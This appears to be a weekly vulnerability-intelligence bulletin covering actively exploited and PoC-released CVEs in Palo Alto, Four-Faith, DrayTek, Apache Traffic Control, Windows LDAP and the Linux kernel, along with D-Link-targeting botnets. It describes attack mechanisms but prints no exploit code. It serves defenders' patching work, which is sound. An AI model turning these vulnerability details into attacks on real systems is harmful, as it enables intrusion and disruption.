This week saw the addition of a single vulnerability to the CISA KEV catalog, involving a critical issue in Palo Alto Networks systems.  Active exploitation has been observed in Four-Faith industrial routers, raising alarms about the need for immediate patching.  Researchers have also released proof-of-concept exploit code for high-impact vulnerabilities in Microsoft Windows, Linux kernel, Apache Traffic Control, and DrayTek gateway devices, amplifying the risk to unpatched systems and critical infrastructure.  

Botnet activity has notably intensified, with emerging threats like Zerobot targeting Tenda WiFi routers and Andoryu exploiting vulnerabilities in GitLab. Meanwhile, IoT-specific botnets, such as IoT Reaper and AndroxGh0St, persist in attacking Cisco routers and PHP Unit. Legacy threats like Mirai and Tsunami are exploiting an eight-year-old flaw in the Eir D1000 modem, underscoring the significant dangers posed by outdated and unsupported infrastructure.  

Adding to the concerns, Fortinet has observed a surge in botnet activity involving Ficora and Capsaicin. These botnets have been actively exploiting end-of-life vulnerabilities in D-Link devices, spotlighting the persistent risks associated with unsupported hardware.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-3393

Palo Alto Networks has patched a high severity denial-of-service (DoS) vulnerability in the DNS Security feature of PAN-OS software. This vulnerability, now listed in the CISA KEV catalog, can be triggered by a maliciously crafted packet sent through the firewall's data plane, causing it to reboot and enter a DoS state. Multiple exploit attempts could even force the firewall into maintenance mode.  Immediate mitigation through patching is strongly recommended to avoid potential disruptions.

‍CVE-2024-12856

VulnCheck has issued an alert regarding the active exploitation of high-severity vulnerability in Four-Faith industrial routers. This unauthenticated operating system command injection vulnerability allows attackers to remotely execute arbitrary commands on vulnerable devices. With a high CVSS Score of 7.2, the vulnerability affects the F3x24 and F3x36 versions of the routers, posing a significant risk to systems still using these versions.  

CVE-2024-12987

A command injection vulnerability has been identified in the web management interface of DrayTek gateway devices, allowing attackers to execute arbitrary commands remotely. With a high CVSS of 7.3, this flaw affects DrayTek Vigor 2960 and DrayTek Vigor 300B devices running version 1.5.1.4. The availability of proof-of-concept (PoC) exploit code further increases the risk, making it crucial for organizations to address this vulnerability promptly to safeguard their systems.

‍CVE-2024-45387

Apache Traffic control versions 8.0.0 to 8.0.1 are vulnerable to a critical SQL injection flaw with a CVSS of 9.9. This vulnerability allows users with specific rules, including 'admin', 'federation', 'operations', 'portal', or 'steering', to execute arbitrary SQL commands on the database through a specially crafted PUT request. The recent release of a proof-of-concept (PoC) exploit on GitHub has heightened the urgency, as it lowers the barrier for attackers to exploit unpatched systems.  

‍CVE-2024-49112

SafeBreach Labs has uncovered a critical zero-click vulnerability in the Windows Lightweight Directory Access Protocol (LDAP) service, dubbed "LDAP Nightmare," with a CVSS score of 9.8. This flaw requires no authentication or preconditions, other than Internet connectivity to the DNS server, making it a highly accessible attack vector. Exploiting this vulnerability can trigger a crash in the Local Security Authority Subsystem Service (LSASS), effectively causing unpatched Windows Servers to crash through malicious LDAP queries.

‍CVE-2023-4147

A use-after-free (UAF) vulnerability has been identified in the Linux kernel's Netfilter framework, impacting versions v5.9-rc1 to v6.5-rc3, with a high CVSS score of 7.8.  This flaw arises from improper handling of the NFTA_RULE_CHAIN_ID during rule additions, allowing authenticated attackers to escalate privileges or cause system crashes. The vulnerability occurs when a rule bypasses normal restrictions and is added to a bound chain using NFTA_RULE_CHAIN_ID, creating an inconsistency. If a chain with the NFT_CHAIN_BINDING flag links to an immediate expression that is subsequently destroyed, it leads to the destruction of the bound chain and its associated rules, triggering the UAF flaw. With a proof-of-concept (PoC) exploit publicly available, it is imperative for system administrators to patch affected systems promptly.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.

Botnets Exploiting End-of-Life D-Link Devices

FortiGuard Labs observed a surge in activity from two botnets: the Mirai variant "FICORA" and the Kaiten variant "CAPSAICIN." Both botnets exploit long-standing vulnerabilities in D-Link devices, leveraging weaknesses in the Home Network Administration Protocol (HNAP) interface. Specifically, attackers use the GetDeviceSettings action to execute malicious commands remotely. Notably, this HNAP vulnerability was first disclosed nearly a decade ago, yet it continues to be a vector for widespread exploitation, underscoring the critical need for regular patching and robust security measures.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/12/30/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://vulncheck.com/blog/four-faith-cve-2024-12856  
3. https://netsecfish.notion.site/Command-Injection-in-apmcfgupload-endpoint-for-DrayTek-Gateway-Devices-1676b683e67c8040b7f1f0ffe29ce18f  
4. https://securityonline.info/66000-draytek-gateways-vulnerable-to-remote-command-injection-cve-2024-12987-poc-published/  
5. https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities  
6. https://securityonline.info/linux-kernel-vulnerability-cve-2023-4147-poc-exploit-published-for-privilege-escalation-flaw/  
7. https://securityonline.info/poc-exploit-released-for-zero-click-vulnerability-cve-2024-49112-in-windows/